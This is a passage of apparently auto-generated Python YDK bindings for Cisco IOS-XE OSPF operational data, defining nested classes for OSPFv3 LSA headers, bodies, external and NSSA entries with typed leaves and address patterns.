**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, self).__init__()
self.yang_name = "ospfv2-external"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['mt_id']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
])
self.mt_id = None
self.metric = None
self.forwarding_address = None
self.external_route_tag = None
self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)
class Ospfv3Lsa(Entity):
"""
OSPFv3 LSA
.. attribute:: header
Decoded OSPFv3 LSA header
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv3 LSA body
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, self).__init__()
self.yang_name = "ospfv3-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv3 LSA header
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: lsa_header
LSA header
**type**\: :py:class:`LsaHeader <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader>`
**config**\: False
.. attribute:: lsa_hdr_options
OSPFv3 LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
])
self.lsa_id = None
self.lsa_hdr_options = Bits()
self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
self.lsa_header.parent = self
self._children_name_map["lsa_header"] = "lsa-header"
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)
class LsaHeader(Entity):
"""
LSA header
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()
self.yang_name = "lsa-header"
self.yang_parent_name = "header"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
])
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self._segment_path = lambda: "lsa-header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv3 LSA body
.. attribute:: network
OSPFv3 network
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: prefix
OSPFv3 inter area prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix>`
**config**\: False
.. attribute:: ia_router
OSPFv3 inter area router
**type**\: :py:class:`IaRouter <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter>`
**config**\: False
.. attribute:: lsa_external
OSPFv3 LSA external
**type**\: :py:class:`LsaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal>`
**config**\: False
.. attribute:: nssa
OSPFv3 NSSA
**type**\: :py:class:`Nssa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa>`
**config**\: False
.. attribute:: link_data
OSPFv3 Link data
**type**\: :py:class:`LinkData <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData>`
**config**\: False
.. attribute:: ia_prefix
OSPFv3 Intra area prefixes
**type**\: :py:class:`IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix>`
**config**\: False
.. attribute:: lsa_flag_options
LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
.. attribute:: lsa_body_flags
LSA Body Flags
**type**\: :py:class:`Ospfv3LsaBodyFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaBodyFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()
self.yang_name = "lsa-body"
self.yang_parent_name = "ospfv3-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"
self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"
self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"
self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"
self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"
self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)
class Network(Entity):
"""
OSPFv3 network
.. attribute:: attached_router
List of the routers attached to the network
**type**\: list of int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_net_options
Network LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__()
self.yang_name = "network"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
])
self.attached_router = []
self.lsa_net_options = Bits()
self._segment_path = lambda: "network"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)
class Prefix(Entity):
"""
OSPFv3 inter area prefix
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ia_prefix
Inter area Prefix
**type**\: str
**config**\: False
.. attribute:: ia_prefix_options
Inter area prefix options
**type**\: str
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
])
self.metric = None
self.ia_prefix = None
self.ia_prefix_options = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)
class IaRouter(Entity):
"""
OSPFv3 inter area router
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: destination_router_id
Router ID of the router being described by the LSA
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: lsa_ia_options
Inter area LSA options
**type**\: :py:class:`Ospfv3LsaOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.Ospfv3LsaOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__()
self.yang_name = "ia-router"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
])
self.metric = None
self.destination_router_id = None
self.lsa_ia_options = Bits()
self._segment_path = lambda: "ia-router"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)
class LsaExternal(Entity):
"""
OSPFv3 LSA external
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__()
self.yang_name = "lsa-external"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-external"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
])
self.e_flag = None
self._segment_path = lambda: "flags"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)
class Nssa(Entity):
"""
OSPFv3 NSSA
.. attribute:: lsa_nssa_external
NSSA LSA
**type**\: :py:class:`LsaNssaExternal <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__()
self.yang_name = "nssa"
self.yang_parent_name = "lsa-body"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))])
self._leafs = OrderedDict()
self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal()
self.lsa_nssa_external.parent = self
self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
self._segment_path = lambda: "nssa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value)
class LsaNssaExternal(Entity):
"""
NSSA LSA
.. attribute:: metric
Metric
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: flags
LSA Flags
**type**\: :py:class:`Flags <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags>`
**config**\: False
.. attribute:: referenced_ls_type
Referenced Link State type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: external_prefix
Prefix
**type**\: str
**config**\: False
.. attribute:: external_prefix_options
Prefix options
**type**\: str
**config**\: False
.. attribute:: forwarding_address
Forwarding address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_route_tag
Route tag
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: referenced_link_state_id
Referenced Link State ID
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__()
self.yang_name = "lsa-nssa-external"
self.yang_parent_name = "nssa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))])
self._leafs = OrderedDict([
('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
])
self.metric = None
self.referenced_ls_type = None
self.external_prefix = None
self.external_prefix_options = None
self.forwarding_address = None
self.external_route_tag = None
self.referenced_link_state_id = None
self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags()
self.flags.parent = self
self._children_name_map["flags"] = "flags"
self._segment_path = lambda: "lsa-nssa-external"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)
class Flags(Entity):
"""
LSA Flags
.. attribute:: e_flag
When set, the metric specified is a Type 2 external metric
**type**\: bool
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()
self.yang_name = "flags"
self.yang_parent_name = "lsa-nssa-external"
self.is_top_level_class = False
